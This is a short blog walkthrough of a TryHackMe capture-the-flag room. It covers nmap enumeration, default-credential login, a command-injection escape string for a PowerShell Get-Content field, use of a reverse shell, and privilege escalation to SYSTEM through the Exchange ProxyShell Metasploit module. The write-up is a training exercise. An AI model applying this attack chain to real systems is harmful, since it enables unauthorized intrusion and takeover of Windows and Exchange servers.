Lookback Walkthrough — TryHackMe Room

SR_ShiravanthanSR_Shiravanthan
2 min read

LookBack Room Link

Enumeration

Nmap

Let’s identify which ports are open, determine the service versions, apply default script scans on these open ports, and save the results to a text file.

nmap -Pn -n -p 80,443,3389 -sV -sC -oN nmap/enum.txt 10.10.114.82
Nmap scan report for 10.10.114.82
Host is up (0.16s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/https
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7
| Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local
| Not valid before: 2023-01-25T21:34:02
|_Not valid after:  2028-01-25T21:34:02
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local
| Not valid before: 2025-07-25T13:44:29
|_Not valid after:  2026-01-24T13:44:29
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 26 09:50:46 2025 -- 1 IP address (1 host up) scanned in 54.56 seconds

Port 80 (Microsoft-IIS/10.0)

Navigating to 10.10.114.82:80 shows a blank page. Let's start finding subdirectories using the Gobuster tool.

Visiting https://10.10.114.82 displays a login page. Using the admin:admin credentials doesn't work here. So, let's navigate to the /test directory, which presents another login page.

This time, the admin:admin credentials work, leading us to an interface where we can execute commands. We use a PowerShell Base64-encoded reverse shell from rev.website.com to gain a reverse shell.

By inserting the character 'a', which is passed into the Get-Content function, we need to escape out of it using: ' ); command #

Initial Access

Crafting our reverse shell using revshells.com by filtering for Windows and selecting PowerShell #3 (Base64 version). Replace the whoami command with our reverse shell payload and wait for the connection.

Privilege Escalation

In the dev\Desktop folder, an interesting file named TODO.txt is present. From this file, we can gather usernames like joe, carol, along with their email IDs and notes from the dev.

We already know that a Microsoft Exchange Server is running on this machine. Let’s identify the version of Exchange Server using the command below.

Once we retrieve the version, we can search online to determine which Exchange Server it is.

In this case, it’s Exchange Server 2019 CU9, which is known to be vulnerable to an RCE (Remote Code Execution) exploit. This can be exploited using Metasploit under the exchange_proxyshell_rce module.

Running the exploit successfully gives us a shell as NT AUTHORITY\SYSTEM.

Tools/Reference for this room

  1. Gobuster

  2. Metasploit

  3. nmap

  4. https://www.rapid7.com/db/modules/exploit/windows/http/exchange_proxyshell_rce/

0
Subscribe to my newsletter

Read articles from SR_Shiravanthan directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

SR_Shiravanthan
SR_Shiravanthan